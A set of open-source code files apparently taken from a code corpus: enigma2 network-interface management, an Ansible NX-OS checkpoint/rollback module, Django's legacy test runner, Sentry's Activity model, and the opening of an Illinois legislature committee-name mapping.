interface') def getAdapterName(self, iface): return iface def getAdapterList(self): return self.ifaces.keys() def getAdapterAttribute(self, iface, attribute): if self.ifaces.has_key(iface): if self.ifaces[iface].has_key(attribute): return self.ifaces[iface][attribute] return None def setAdapterAttribute(self, iface, attribute, value): # print "setting for adapter", iface, "attribute", attribute, " to value", value if self.ifaces.has_key(iface): self.ifaces[iface][attribute] = value def removeAdapterAttribute(self, iface, attribute): if self.ifaces.has_key(iface): if self.ifaces[iface].has_key(attribute): del self.ifaces[iface][attribute] def getNameserverList(self): if len(self.nameservers) == 0: return [[0, 0, 0, 0], [0, 0, 0, 0]] else: return self.nameservers def clearNameservers(self): self.nameservers = [] def addNameserver(self, nameserver): if nameserver not in self.nameservers: self.nameservers.append(nameserver) def removeNameserver(self, nameserver): if nameserver in self.nameservers: self.nameservers.remove(nameserver) def changeNameserver(self, oldnameserver, newnameserver): if oldnameserver in self.nameservers: for i in range(len(self.nameservers)): if self.nameservers[i] == oldnameserver: self.nameservers[i] = newnameserver def resetNetworkConfig(self, mode='lan', callback = None): self.resetNetworkConsole = Console() self.commands = [] self.commands.append("/etc/init.d/avahi-daemon stop") for iface in self.ifaces.keys(): if iface != 'eth0' or not self.onRemoteRootFS(): self.commands.append("ip addr flush dev " + iface) self.commands.append("/etc/init.d/networking stop") self.commands.append("killall -9 udhcpc") self.commands.append("rm /var/run/udhcpc*") self.resetNetworkConsole.eBatch(self.commands, self.resetNetworkFinishedCB, [mode, callback], debug=True) def resetNetworkFinishedCB(self, extra_args): (mode, callback) = extra_args if len(self.resetNetworkConsole.appContainers) == 0: self.writeDefaultNetworkConfig(mode, callback) def writeDefaultNetworkConfig(self,mode='lan', callback = None): fp = file('/etc/network/interfaces', 'w') fp.write("# automatically generated by enigma2\n# do NOT change manually!\n\n") fp.write("auto lo\n") fp.write("iface lo inet loopback\n\n") if mode == 'wlan': fp.write("auto wlan0\n") fp.write("iface wlan0 inet dhcp\n") if mode == 'wlan-mpci': fp.write("auto ath0\n") fp.write("iface ath0 inet dhcp\n") if mode == 'lan': fp.write("auto eth0\n") fp.write("iface eth0 inet dhcp\n") fp.write("\n") fp.close() self.resetNetworkConsole = Console() self.commands = [] if mode == 'wlan': self.commands.append("ifconfig eth0 down") self.commands.append("ifconfig ath0 down") self.commands.append("ifconfig wlan0 up") if mode == 'wlan-mpci': self.commands.append("ifconfig eth0 down") self.commands.append("ifconfig wlan0 down") self.commands.append("ifconfig ath0 up") if mode == 'lan': self.commands.append("ifconfig eth0 up") self.commands.append("ifconfig wlan0 down") self.commands.append("ifconfig ath0 down") self.commands.append("/etc/init.d/avahi-daemon start") self.resetNetworkConsole.eBatch(self.commands, self.resetNetworkFinished, [mode,callback], debug=True) def resetNetworkFinished(self,extra_args): (mode, callback) = extra_args if len(self.resetNetworkConsole.appContainers) == 0: if callback is not None: callback(True,mode) def checkNetworkState(self,statecallback): self.NetworkState = 0 cmd1 = "ping -c 1 www.google.de" cmd2 = "ping -c 1 www.google.com" cmd3 = "ping -c 1 www.google.nl" self.PingConsole = Console() self.PingConsole.ePopen(cmd1, self.checkNetworkStateFinished,statecallback) self.PingConsole.ePopen(cmd2, self.checkNetworkStateFinished,statecallback) self.PingConsole.ePopen(cmd3, self.checkNetworkStateFinished,statecallback) def checkNetworkStateFinished(self, result, retval,extra_args): (statecallback) = extra_args if self.PingConsole is not None: if retval == 0: self.PingConsole = None statecallback(self.NetworkState) else: self.NetworkState += 1 if len(self.PingConsole.appContainers) == 0: statecallback(self.NetworkState) def restartNetwork(self,callback = None): self.restartConsole = Console() self.config_ready = False self.msgPlugins() self.commands = [] self.commands.append("/etc/init.d/avahi-daemon stop") for iface in self.ifaces.keys(): if iface != 'eth0' or not self.onRemoteRootFS(): self.commands.append("ifdown " + iface) self.commands.append("ip addr flush dev " + iface) self.commands.append("/etc/init.d/networking stop") self.commands.append("killall -9 udhcpc") self.commands.append("rm /var/run/udhcpc*") self.commands.append("/etc/init.d/networking start") self.commands.append("/etc/init.d/avahi-daemon start") self.restartConsole.eBatch(self.commands, self.restartNetworkFinished, callback, debug=True) def restartNetworkFinished(self,extra_args): ( callback ) = extra_args if callback is not None: callback(True) def getLinkState(self,iface,callback): cmd = self.ethtool_bin + " " + iface self.LinkConsole = Console() self.LinkConsole.ePopen(cmd, self.getLinkStateFinished,callback) def getLinkStateFinished(self, result, retval,extra_args): (callback) = extra_args if self.LinkConsole is not None: if len(self.LinkConsole.appContainers) == 0: callback(result) def stopPingConsole(self): if self.PingConsole is not None: if len(self.PingConsole.appContainers): for name in self.PingConsole.appContainers.keys(): self.PingConsole.kill(name) def stopLinkStateConsole(self): if self.LinkConsole is not None: if len(self.LinkConsole.appContainers): for name in self.LinkConsole.appContainers.keys(): self.LinkConsole.kill(name) def stopDNSConsole(self): if self.DnsConsole is not None: if len(self.DnsConsole.appContainers): for name in self.DnsConsole.appContainers.keys(): self.DnsConsole.kill(name) def stopRestartConsole(self): if self.restartConsole is not None: if len(self.restartConsole.appContainers): for name in self.restartConsole.appContainers.keys(): self.restartConsole.kill(name) def stopGetInterfacesConsole(self): if self.Console is not None: if len(self.Console.appContainers): for name in self.Console.appContainers.keys(): self.Console.kill(name) def stopDeactivateInterfaceConsole(self): if self.deactivateInterfaceConsole is not None: self.deactivateInterfaceConsole.killAll() self.deactivateInterfaceConsole = None def stopActivateInterfaceConsole(self): if self.activateInterfaceConsole is not None: self.activateInterfaceConsole.killAll() self.activateInterfaceConsole = None def checkforInterface(self,iface): if self.getAdapterAttribute(iface, 'up') is True: return True else: ret=os.system("ifconfig " + iface + " up") os.system("ifconfig " + iface + " down") if ret == 0: return True else: return False def checkDNSLookup(self,statecallback): cmd1 = "nslookup www.dream-multimedia-tv.de" cmd2 = "nslookup www.heise.de" cmd3 = "nslookup www.google.de" self.DnsConsole = Console() self.DnsConsole.ePopen(cmd1, self.checkDNSLookupFinished,statecallback) self.DnsConsole.ePopen(cmd2, self.checkDNSLookupFinished,statecallback) self.DnsConsole.ePopen(cmd3, self.checkDNSLookupFinished,statecallback) def checkDNSLookupFinished(self, result, retval,extra_args): (statecallback) = extra_args if self.DnsConsole is not None: if retval == 0: self.DnsConsole = None statecallback(self.DnsState) else: self.DnsState += 1 if len(self.DnsConsole.appContainers) == 0: statecallback(self.DnsState) def deactivateInterface(self,ifaces,callback = None): self.config_ready = False self.msgPlugins() commands = [] def buildCommands(iface): commands.append("ifdown " + iface) commands.append("ip addr flush dev " + iface) #wpa_supplicant sometimes doesn't quit properly on SIGTERM if os.path.exists('/var/run/wpa_supplicant/'+ iface): commands.append("wpa_cli -i" + iface + " terminate") if not self.deactivateInterfaceConsole: self.deactivateInterfaceConsole = Console() if isinstance(ifaces, (list, tuple)): for iface in ifaces: if iface != 'eth0' or not self.onRemoteRootFS(): buildCommands(iface) else: if ifaces == 'eth0' and self.onRemoteRootFS(): if callback is not None: callback(True) return buildCommands(ifaces) self.deactivateInterfaceConsole.eBatch(commands, self.deactivateInterfaceFinished, [ifaces,callback], debug=True) def deactivateInterfaceFinished(self,extra_args): (ifaces, callback) = extra_args def checkCommandResult(iface): if self.deactivateInterfaceConsole and self.deactivateInterfaceConsole.appResults.has_key("ifdown " + iface): result = str(self.deactivateInterfaceConsole.appResults.get("ifdown " + iface)).strip("\n") if result == "ifdown: interface " + iface + " not configured": return False else: return True #ifdown sometimes can't get the interface down. if isinstance(ifaces, (list, tuple)): for iface in ifaces: if checkCommandResult(iface) is False: Console().ePopen(("ifconfig " + iface + " down" )) else: if checkCommandResult(ifaces) is False: Console().ePopen(("ifconfig " + ifaces + " down" )) if self.deactivateInterfaceConsole: if len(self.deactivateInterfaceConsole.appContainers) == 0: if callback is not None: callback(True) def activateInterface(self,iface,callback = None): if self.config_ready: self.config_ready = False self.msgPlugins() if iface == 'eth0' and self.onRemoteRootFS(): if callback is not None: callback(True) return if not self.activateInterfaceConsole: self.activateInterfaceConsole = Console() commands = ["ifup " + iface] self.activateInterfaceConsole.eBatch(commands, self.activateInterfaceFinished, callback, debug=True) def activateInterfaceFinished(self,extra_args): callback = extra_args if self.activateInterfaceConsole: if len(self.activateInterfaceConsole.appContainers) == 0: if callback is not None: callback(True) def sysfsPath(self, iface): return '/sys/class/net/' + iface def isWirelessInterface(self, iface): if iface in self.wlan_interfaces: return True if os.path.isdir(self.sysfsPath(iface) + '/wireless'): return True # r871x_usb_drv on kernel 2.6.12 is not identifiable over /sys/class/net/'ifacename'/wireless so look also inside /proc/net/wireless device = re.compile('[a-z]{2,}[0-9]*:') ifnames = [] fp = open('/proc/net/wireless', 'r') for line in fp: try: ifnames.append(device.search(line).group()[:-1]) except AttributeError: pass fp.close() if iface in ifnames: return True return False def getWlanModuleDir(self, iface = None): devicedir = self.sysfsPath(iface) + '/device' moduledir = devicedir + '/driver/module' if os.path.isdir(moduledir): return moduledir # identification is not possible over default moduledir for x in os.listdir(devicedir): # rt3070 on kernel 2.6.18 registers wireless devices as usb_device (e.g. 1-1.3:1.0) and identification is only possible over /sys/class/net/'ifacename'/device/1-xxx if x.startswith("1-"): moduledir = devicedir + '/' + x + '/driver/module' if os.path.isdir(moduledir): return moduledir # rt73, zd1211b, r871x_usb_drv on kernel 2.6.12 can be identified over /sys/class/net/'ifacename'/device/driver, so look also here moduledir = devicedir + '/driver' if os.path.isdir(moduledir): return moduledir return None def detectWlanModule(self, iface = None): if not self.isWirelessInterface(iface): return None devicedir = self.sysfsPath(iface) + '/device' if os.path.isdir(devicedir + '/ieee80211'): return 'nl80211' moduledir = self.getWlanModuleDir(iface) if moduledir: module = os.path.basename(os.path.realpath(moduledir)) if module in ('ath_pci','ath5k'): return 'madwifi' if module in ('rt73','rt73'): return 'ralink' if module == 'zd1211b': return 'zydas' return 'wext' def calc_netmask(self,nmask): from struct import pack, unpack from socket import inet_ntoa, inet_aton mask = 1L<<31 xnet = (1L<<32)-1 cidr_range = range(0, 32) cidr = long(nmask) if cidr not in cidr_range: print 'cidr invalid: %d' % cidr return None else: nm = ((1L<<cidr)-1)<<(32-cidr) netmask = str(inet_ntoa(pack('>L', nm))) return netmask def msgPlugins(self): if self.config_ready is not None: for p in plugins.getPlugins(PluginDescriptor.WHERE_NETWORKCONFIG_READ): p(reason=self.config_ready) def hotplug(self, event): interface = event['INTERFACE'] if self.isBlacklisted(interface): return action = event['ACTION'] if action == "add": print "[Network] Add new interface:", interface self.getAddrInet(interface, None) elif action == "remove": print "[Network] Removed interface:", interface try: del self.ifaces[interface] except KeyError: pass iNetwork = Network() def InitNetwork(): pass
gpl-2.0
vaygr/ansible
lib/ansible/modules/network/nxos/nxos_rollback.py
50
3790
#!/usr/bin/python # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'network'} DOCUMENTATION = ''' --- module: nxos_rollback extends_documentation_fragment: nxos version_added: "2.2" short_description: Set a checkpoint or rollback to a checkpoint. description: - This module offers the ability to set a configuration checkpoint file or rollback to a configuration checkpoint file on Cisco NXOS switches. author: - Jason Edelman (@jedelman8) - Gabriele Gerbino (@GGabriele) notes: - Tested against NXOSv 7.3.(0)D1(1) on VIRL - Sometimes C(transport=nxapi) may cause a timeout error. options: checkpoint_file: description: - Name of checkpoint file to create. Mutually exclusive with rollback_to. rollback_to: description: - Name of checkpoint file to rollback to. Mutually exclusive with checkpoint_file. ''' EXAMPLES = ''' - nxos_rollback: checkpoint_file: backup.cfg username: "{{ un }}" password: "{{ pwd }}" host: "{{ inventory_hostname }}" - nxos_rollback: rollback_to: backup.cfg username: "{{ un }}" password: "{{ pwd }}" host: "{{ inventory_hostname }}" ''' RETURN = ''' filename: description: The filename of the checkpoint/rollback file. returned: success type: string sample: 'backup.cfg' status: description: Which operation took place and whether it was successful. returned: success type: string sample: 'rollback executed' ''' from ansible.module_utils.network.nxos.nxos import nxos_argument_spec, run_commands from ansible.module_utils.basic import AnsibleModule def checkpoint(filename, module): commands = [{ 'command': 'terminal dont-ask', 'output': 'text', }, { 'command': 'checkpoint file %s' % filename, 'output': 'text', }] run_commands(module, commands) def rollback(filename, module): commands = [{ 'command': 'rollback running-config file %s' % filename, 'output': 'text', }] run_commands(module, commands) def main(): argument_spec = dict( checkpoint_file=dict(required=False), rollback_to=dict(required=False) ) argument_spec.update(nxos_argument_spec) module = AnsibleModule(argument_spec=argument_spec, mutually_exclusive=[['checkpoint_file', 'rollback_to']], supports_check_mode=False) checkpoint_file = module.params['checkpoint_file'] rollback_to = module.params['rollback_to'] status = None filename = None changed = False if checkpoint_file: checkpoint(checkpoint_file, module) status = 'checkpoint file created' elif rollback_to: rollback(rollback_to, module) status = 'rollback executed' changed = True filename = rollback_to or checkpoint_file module.exit_json(changed=changed, status=status, filename=filename) if __name__ == '__main__': main()
gpl-3.0
theicfire/djangofun
django/test/simple.py
150
15012
import unittest as real_unittest from django.conf import settings from django.core.exceptions import ImproperlyConfigured from django.db.models import get_app, get_apps from django.test import _doctest as doctest from django.test.utils import setup_test_environment, teardown_test_environment from django.test.testcases import OutputChecker, DocTestRunner, TestCase from django.utils import unittest try: all except NameError: from django.utils.itercompat import all __all__ = ('DjangoTestRunner', 'DjangoTestSuiteRunner', 'run_tests') # The module name for tests outside models.py TEST_MODULE = 'tests' doctestOutputChecker = OutputChecker() class DjangoTestRunner(unittest.TextTestRunner): def __init__(self, *args, **kwargs): import warnings warnings.warn( "DjangoTestRunner is deprecated; it's functionality is indistinguishable from TextTestRunner", PendingDeprecationWarning ) super(DjangoTestRunner, self).__init__(*args, **kwargs) def get_tests(app_module): try: app_path = app_module.__name__.split('.')[:-1] test_module = __import__('.'.join(app_path + [TEST_MODULE]), {}, {}, TEST_MODULE) except ImportError, e: # Couldn't import tests.py. Was it due to a missing file, or # due to an import error in a tests.py that actually exists? import os.path from imp import find_module try: mod = find_module(TEST_MODULE, [os.path.dirname(app_module.__file__)]) except ImportError: # 'tests' module doesn't exist. Move on. test_module = None else: # The module exists, so there must be an import error in the # test module itself. We don't need the module; so if the # module was a single file module (i.e., tests.py), close the file # handle returned by find_module. Otherwise, the test module # is a directory, and there is nothing to close. if mod[0]: mod[0].close() raise return test_module def build_suite(app_module): "Create a complete Django test suite for the provided application module" suite = unittest.TestSuite() # Load unit and doctests in the models.py module. If module has # a suite() method, use it. Otherwise build the test suite ourselves. if hasattr(app_module, 'suite'): suite.addTest(app_module.suite()) else: suite.addTest(unittest.defaultTestLoader.loadTestsFromModule(app_module)) try: suite.addTest(doctest.DocTestSuite(app_module, checker=doctestOutputChecker, runner=DocTestRunner)) except ValueError: # No doc tests in models.py pass # Check to see if a separate 'tests' module exists parallel to the # models module test_module = get_tests(app_module) if test_module: # Load unit and doctests in the tests.py module. If module has # a suite() method, use it. Otherwise build the test suite ourselves. if hasattr(test_module, 'suite'): suite.addTest(test_module.suite()) else: suite.addTest(unittest.defaultTestLoader.loadTestsFromModule(test_module)) try: suite.addTest(doctest.DocTestSuite(test_module, checker=doctestOutputChecker, runner=DocTestRunner)) except ValueError: # No doc tests in tests.py pass return suite def build_test(label): """Construct a test case with the specified label. Label should be of the form model.TestClass or model.TestClass.test_method. Returns an instantiated test or test suite corresponding to the label provided. """ parts = label.split('.') if len(parts) < 2 or len(parts) > 3: raise ValueError("Test label '%s' should be of the form app.TestCase or app.TestCase.test_method" % label) # # First, look for TestCase instances with a name that matches # app_module = get_app(parts[0]) test_module = get_tests(app_module) TestClass = getattr(app_module, parts[1], None) # Couldn't find the test class in models.py; look in tests.py if TestClass is None: if test_module: TestClass = getattr(test_module, parts[1], None) try: if issubclass(TestClass, (unittest.TestCase, real_unittest.TestCase)): if len(parts) == 2: # label is app.TestClass try: return unittest.TestLoader().loadTestsFromTestCase(TestClass) except TypeError: raise ValueError("Test label '%s' does not refer to a test class" % label) else: # label is app.TestClass.test_method return TestClass(parts[2]) except TypeError: # TestClass isn't a TestClass - it must be a method or normal class pass # # If there isn't a TestCase, look for a doctest that matches # tests = [] for module in app_module, test_module: try: doctests = doctest.DocTestSuite(module, checker=doctestOutputChecker, runner=DocTestRunner) # Now iterate over the suite, looking for doctests whose name # matches the pattern that was given for test in doctests: if test._dt_test.name in ( '%s.%s' % (module.__name__, '.'.join(parts[1:])), '%s.__test__.%s' % (module.__name__, '.'.join(parts[1:]))): tests.append(test) except ValueError: # No doctests found. pass # If no tests were found, then we were given a bad test label. if not tests: raise ValueError("Test label '%s' does not refer to a test" % label) # Construct a suite out of the tests that matched. return unittest.TestSuite(tests) def partition_suite(suite, classes, bins): """ Partitions a test suite by test type. classes is a sequence of types bins is a sequence of TestSuites, one more than classes Tests of type classes[i] are added to bins[i], tests with no match found in classes are place in bins[-1] """ for test in suite: if isinstance(test, unittest.TestSuite): partition_suite(test, classes, bins) else: for i in range(len(classes)): if isinstance(test, classes[i]): bins[i].addTest(test) break else: bins[-1].addTest(test) def reorder_suite(suite, classes): """ Reorders a test suite by test type. classes is a sequence of types All tests of type clases[0] are placed first, then tests of type classes[1], etc. Tests with no match in classes are placed last. """ class_count = len(classes) bins = [unittest.TestSuite() for i in range(class_count+1)] partition_suite(suite, classes, bins) for i in range(class_count): bins[0].addTests(bins[i+1]) return bins[0] def dependency_ordered(test_databases, dependencies): """Reorder test_databases into an order that honors the dependencies described in TEST_DEPENDENCIES. """ ordered_test_databases = [] resolved_databases = set() while test_databases: changed = False deferred = [] while test_databases: signature, (db_name, aliases) = test_databases.pop() dependencies_satisfied = True for alias in aliases: if alias in dependencies: if all(a in resolved_databases for a in dependencies[alias]): # all dependencies for this alias are satisfied dependencies.pop(alias) resolved_databases.add(alias) else: dependencies_satisfied = False else: resolved_databases.add(alias) if dependencies_satisfied: ordered_test_databases.append((signature, (db_name, aliases))) changed = True else: deferred.append((signature, (db_name, aliases))) if not changed: raise ImproperlyConfigured("Circular dependency in TEST_DEPENDENCIES") test_databases = deferred return ordered_test_databases class DjangoTestSuiteRunner(object): def __init__(self, verbosity=1, interactive=True, failfast=True, **kwargs): self.verbosity = verbosity self.interactive = interactive self.failfast = failfast def setup_test_environment(self, **kwargs): setup_test_environment() settings.DEBUG = False unittest.installHandler() def build_suite(self, test_labels, extra_tests=None, **kwargs): suite = unittest.TestSuite() if test_labels: for label in test_labels: if '.' in label: suite.addTest(build_test(label)) else: app = get_app(label) suite.addTest(build_suite(app)) else: for app in get_apps(): suite.addTest(build_suite(app)) if extra_tests: for test in extra_tests: suite.addTest(test) return reorder_suite(suite, (TestCase,)) def setup_databases(self, **kwargs): from django.db import connections, DEFAULT_DB_ALIAS # First pass -- work out which databases actually need to be created, # and which ones are test mirrors or duplicate entries in DATABASES mirrored_aliases = {} test_databases = {} dependencies = {} for alias in connections: connection = connections[alias] if connection.settings_dict['TEST_MIRROR']: # If the database is marked as a test mirror, save # the alias. mirrored_aliases[alias] = connection.settings_dict['TEST_MIRROR'] else: # Store a tuple with DB parameters that uniquely identify it. # If we have two aliases with the same values for that tuple, # we only need to create the test database once. item = test_databases.setdefault( connection.creation.test_db_signature(), (connection.settings_dict['NAME'], []) ) item[1].append(alias) if 'TEST_DEPENDENCIES' in connection.settings_dict: dependencies[alias] = connection.settings_dict['TEST_DEPENDENCIES'] else: if alias != DEFAULT_DB_ALIAS: dependencies[alias] = connection.settings_dict.get('TEST_DEPENDENCIES', [DEFAULT_DB_ALIAS]) # Second pass -- actually create the databases. old_names = [] mirrors = [] for signature, (db_name, aliases) in dependency_ordered(test_databases.items(), dependencies): # Actually create the database for the first connection connection = connections[aliases[0]] old_names.append((connection, db_name, True)) test_db_name = connection.creation.create_test_db(self.verbosity, autoclobber=not self.interactive) for alias in aliases[1:]: connection = connections[alias] if db_name: old_names.append((connection, db_name, False)) connection.settings_dict['NAME'] = test_db_name else: # If settings_dict['NAME'] isn't defined, we have a backend where # the name isn't important -- e.g., SQLite, which uses :memory:. # Force create the database instead of assuming it's a duplicate. old_names.append((connection, db_name, True)) connection.creation.create_test_db(self.verbosity, autoclobber=not self.interactive) for alias, mirror_alias in mirrored_aliases.items(): mirrors.append((alias, connections[alias].settings_dict['NAME'])) connections[alias].settings_dict['NAME'] = connections[mirror_alias].settings_dict['NAME'] return old_names, mirrors def run_suite(self, suite, **kwargs): return unittest.TextTestRunner(verbosity=self.verbosity, failfast=self.failfast).run(suite) def teardown_databases(self, old_config, **kwargs): from django.db import connections old_names, mirrors = old_config # Point all the mirrors back to the originals for alias, old_name in mirrors: connections[alias].settings_dict['NAME'] = old_name # Destroy all the non-mirror databases for connection, old_name, destroy in old_names: if destroy: connection.creation.destroy_test_db(old_name, self.verbosity) else: connection.settings_dict['NAME'] = old_name def teardown_test_environment(self, **kwargs): unittest.removeHandler() teardown_test_environment() def suite_result(self, suite, result, **kwargs): return len(result.failures) + len(result.errors) def run_tests(self, test_labels, extra_tests=None, **kwargs): """ Run the unit tests for all the test labels in the provided list. Labels must be of the form: - app.TestClass.test_method Run a single specific test method - app.TestClass Run all the test methods in a given class - app Search for doctests and unittests in the named application. When looking for tests, the test runner will look in the models and tests modules for the application. A list of 'extra' tests may also be provided; these tests will be added to the test suite. Returns the number of tests that failed. """ self.setup_test_environment() suite = self.build_suite(test_labels, extra_tests) old_config = self.setup_databases() result = self.run_suite(suite) self.teardown_databases(old_config) self.teardown_test_environment() return self.suite_result(suite, result) def run_tests(test_labels, verbosity=1, interactive=True, failfast=False, extra_tests=None): import warnings warnings.warn( 'The run_tests() test runner has been deprecated in favor of DjangoTestSuiteRunner.', DeprecationWarning ) test_runner = DjangoTestSuiteRunner(verbosity=verbosity, interactive=interactive, failfast=failfast) return test_runner.run_tests(test_labels, extra_tests=extra_tests)
bsd-3-clause
kevinlondon/sentry
src/sentry/models/activity.py
5
6259
""" sentry.models.activity ~~~~~~~~~~~~~~~~~~~~~~ :copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details. :license: BSD, see LICENSE for more details. """ from __future__ import absolute_import from django.conf import settings from django.core.urlresolvers import reverse from django.db import models from django.db.models import F from django.utils import timezone from sentry.db.models import ( Model, BoundedPositiveIntegerField, FlexibleForeignKey, GzippedDictField, sane_repr ) from sentry.utils.http import absolute_uri class Activity(Model): __core__ = False SET_RESOLVED = 1 SET_UNRESOLVED = 2 SET_MUTED = 3 SET_PUBLIC = 4 SET_PRIVATE = 5 SET_REGRESSION = 6 CREATE_ISSUE = 7 NOTE = 8 FIRST_SEEN = 9 RELEASE = 10 ASSIGNED = 11 UNASSIGNED = 12 TYPE = ( # (TYPE, verb-slug) (SET_RESOLVED, 'set_resolved'), (SET_UNRESOLVED, 'set_unresolved'), (SET_MUTED, 'set_muted'), (SET_PUBLIC, 'set_public'), (SET_PRIVATE, 'set_private'), (SET_REGRESSION, 'set_regression'), (CREATE_ISSUE, 'create_issue'), (NOTE, 'note'), (FIRST_SEEN, 'first_seen'), (RELEASE, 'release'), (ASSIGNED, 'assigned'), (UNASSIGNED, 'unassigned'), ) project = FlexibleForeignKey('sentry.Project') group = FlexibleForeignKey('sentry.Group', null=True) event = FlexibleForeignKey('sentry.Event', null=True) # index on (type, ident) type = BoundedPositiveIntegerField(choices=TYPE) ident = models.CharField(max_length=64, null=True) # if the user is not set, it's assumed to be the system user = FlexibleForeignKey(settings.AUTH_USER_MODEL, null=True) datetime = models.DateTimeField(default=timezone.now) data = GzippedDictField(null=True) class Meta: app_label = 'sentry' db_table = 'sentry_activity' __repr__ = sane_repr('project_id', 'group_id', 'event_id', 'user_id', 'type', 'ident') def save(self, *args, **kwargs): created = bool(not self.id) super(Activity, self).save(*args, **kwargs) if not created: return # HACK: support Group.num_comments if self.type == Activity.NOTE: self.group.update(num_comments=F('num_comments') + 1) if self.event: self.event.update(num_comments=F('num_comments') + 1) def delete(self, *args, **kwargs): super(Activity, self).delete(*args, **kwargs) # HACK: support Group.num_comments if self.type == Activity.NOTE: self.group.update(num_comments=F('num_comments') - 1) if self.event: self.event.update(num_comments=F('num_comments') - 1) def get_recipients(self): from sentry.models import UserOption if self.type == Activity.ASSIGNED: # dont email the user if they took the action send_to = [self.data['assignee']] else: member_set = self.project.member_set.values_list('user', flat=True) if not member_set: return [] disabled = set(UserOption.objects.filter( user__in=member_set, key='subscribe_notes', value=u'0', ).values_list('user', flat=True)) send_to = [u for u in member_set if u not in disabled] # never include the actor send_to = [u for u in send_to if u != self.user_id] return send_to def send_notification(self): from sentry.models import Release from sentry.utils.email import MessageBuilder, group_id_to_email if self.type not in (Activity.NOTE, Activity.ASSIGNED, Activity.RELEASE): return send_to = self.get_recipients() if not send_to: return project = self.project org = self.project.organization if self.user: author = self.user.first_name or self.user.username else: author = None subject_prefix = self.project.get_option( 'subject_prefix', settings.EMAIL_SUBJECT_PREFIX) if subject_prefix: subject_prefix = subject_prefix.rstrip() + ' ' if self.group: subject = '%s%s' % (subject_prefix, self.group.get_email_subject()) elif self.type == Activity.RELEASE: subject = '%sRelease %s' % (subject_prefix, self.data['version']) else: raise NotImplementedError headers = {} context = { 'data': self.data, 'author': author, 'project': self.project, 'project_link': absolute_uri(reverse('sentry-stream', kwargs={ 'organization_slug': org.slug, 'project_id': project.slug, })), } if self.group: headers.update({ 'X-Sentry-Reply-To': group_id_to_email(self.group.id), }) context.update({ 'group': self.group, 'link': self.group.get_absolute_url(), }) # TODO(dcramer): abstract each activity email into its own helper class if self.type == Activity.RELEASE: context.update({ 'release': Release.objects.get( version=self.data['version'], project=project, ), 'release_link': absolute_uri(reverse('sentry-release-details', kwargs={ 'organization_slug': org.slug, 'project_id': project.slug, 'version': self.data['version'], })), }) template_name = self.get_type_display() msg = MessageBuilder( subject=subject, context=context, template='sentry/emails/activity/{}.txt'.format(template_name), html_template='sentry/emails/activity/{}.html'.format(template_name), headers=headers, reference=self, reply_reference=self.group, ) msg.add_users(send_to, project=self.project) msg.send_async()
bsd-3-clause
sunlightlabs/openstates
scrapers/il/_committees.py
3
47168
# In different sessions of the Illinois legislature, the same # committee can have different names appear on http://ilga.gov/ # Sometimes this is just spelling of typographic, ("Agriculture & # Conservation" vs "Agriculture and Conservation"). Sometimes the # difference is larger. The COMMITTEES dictionary can be used for # resolving these different names to to the same committee. The keys # of COMMITTEE are a tuple of the 'Name' and 'Code' of the committee # as they appear on http://ilga.gov/senate/committees/default.asp or # http://ilga.gov/house/committees/default.asp. The values are arbitrary ints, used only # within the scraper as a unique identifier for the actual committee. # HIGHEST ID POSSIBLY IN USE: 1132 COMMITTEES = { ("8th District Education Oversight Su", "HAPE-HDEO"): "97", ("Access to Federal Funding", "HAFF"): "98", ("Accountability & Administrative Rev", "HAAR"): "99", ("Accountability, Subcommittee on Ele", "HELM-ACCT"): "100", ("Adoption Reform", "ADPT"): "2", ("Adoption & Child Welfare", "HACW"): "2", ("Affordable Alzheimer's Services", "HHCL-AASE"): "101", ("Alzheimer's Disease Task Force", "ADTF"): "106", ("Exec. Subcommittee - St./Loc. Gov't", "SEXC-ESLG"): "206", ("O'Hare Airport Environmental Impact", "HENH-OHAR"): "348", ("Spec. Comm. on Workers' Comp Reform", "SWCR"): "432", ("Subcomm. Children's Health Issues", "SNVR-SCEH"): "494", ("Subcomm.Adv.PracticeNurse's License", "SLIC-SPNL"): "499", ("Veterans' Affairs", "HVET"): "87", ("Worker's Compensation Subcommittee", "HLBR-WCOM"): "641", ("Workers' Compensation Reform", "HWCR"): "645", ("Workers' Compensation Subcommittee", "HLBR-WORK"): "641", ("Workers' Compensation and Unemploy", "HLBR-WCUI"): "91", ("Workers' Compensation", "HLBR-WORC"): "641", ("Adoption Reform, Special Committee", "ADPT"): "2", ("Agency Operations Subcommittee", "HSGA-HAGO"): "102", ("Aging", "HAGI"): "103", ("Agreed Labor Bills, Subcommittee", "HLBR-AGLB"): "104", ("Agriculture & Conservation", "HAGC"): "6", ("Agriculture & Conservation", "SAGR"): "5", ("Agriculture and Conservation", "HAGC"): "6", ("Agriculture and Conservation", "SAGR"): "5", ("Agriculture", "SAGR"): "5", ("Air Quality", "HENE-AIRQ"): "9", ("Air Quality, Subcommittee on", "HENE-AIRQ"): "9", ("Air Subcommittee", "HENE-SAIR"): "9", ("Airports, Subcomittee on", "HTRN-AIRP"): "10", ("Airports, Subcommittee on", "HTRN-AIRP"): "10", ("Amendments", "SHCA-HCAA"): "107", ("Amusement & Online Gaming Sub", "HCDA-CAOG"): "1107", ("Analytics Subcommittee", "HCBA-ALYT"): "108", ("Animal Baiting Subcommittee", "HAGC-ANIM"): "60", ("Animals Subcommittee", "HAGC-ANIM"): "60", ("Approp I", "SAPA"): "14", ("Approp II", "SAPB"): "15", ("Approp-Elementary & Secondary Educ", "HAPE"): "109", ("Approp. Elementary and Second Ed.", "HAPE-APES"): "1001", ("Appropriations I", "SAPA"): "14", ("Appropriations II", "SAPB"): "15", ("Appropriations III", "SAPC"): "111", ("Appropriations-Capital", "HCAP"): "1104", ("Appropriations-General Service", "HAPG"): "112", ("Appropriations-Higher Education", "HAPI"): "113", ("Appropriations-Human Services", "HAPH"): "114", ("Appropriations-Public Safety", "HAPP"): "115", ("Armed Forces & Military Affairs", "HAMA"): "116", ("Assignments", "SCOA"): "21", ("Assistance and Benefits Subcommitte", "HHSV-ASBE"): "117", ("Ballot Access Subcommittee", "HELE-BALL"): "118", ("Bio-Technology", "HBIO"): "119", ("Biotechnology Committee", "BIOT"): "119", ("Broadband Access and IT 